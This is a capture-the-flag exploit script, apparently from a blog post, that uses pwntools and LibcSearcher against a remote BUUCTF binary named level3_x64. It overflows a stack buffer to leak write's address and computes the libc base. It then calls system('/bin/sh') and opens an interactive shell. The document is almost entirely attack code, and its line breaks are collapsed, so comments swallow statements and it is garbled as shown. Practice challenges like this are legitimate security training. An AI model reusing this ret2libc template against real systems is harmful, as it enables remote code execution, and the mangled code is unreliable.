#coding=utf8from pwn import *from LibcSearcher import*context.log_level = 'debug'def debug():gdb.attach(io)pause()#io =process('./level3_x64')io = remote("node4.buuoj.cn",25798)elf =ELF('./level3_x64')pop_rdi = 0x00000000004006b3pop_rsi_r15 =0x00000000004006b1write_got = elf.got['write']write_plt = elf.plt['write']main_addr = elf.sym['main']#gdb.attach(io)payload = b'a'*0x88+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main_addr)io.recvuntil('Input:\n')io.sendline(payload)#pause()write_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))log.success("addr:"+hex(write_addr))libc = LibcSearcher('write',write_addr)libc_base = write_addr-libc.dump('write')log.success('addr:'+hex(libc_base))system_addr = libc_base+libc.dump('system')log.success('addr:'+hex(system_addr))bin_sh = libc_base+libc.dump('str_bin_sh')payload =b'a'*0x88+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)io.recvuntil('Input:\n')io.sendline(payload)#pause()io.interactive()
若有收获,就点个赞吧
0 人点赞
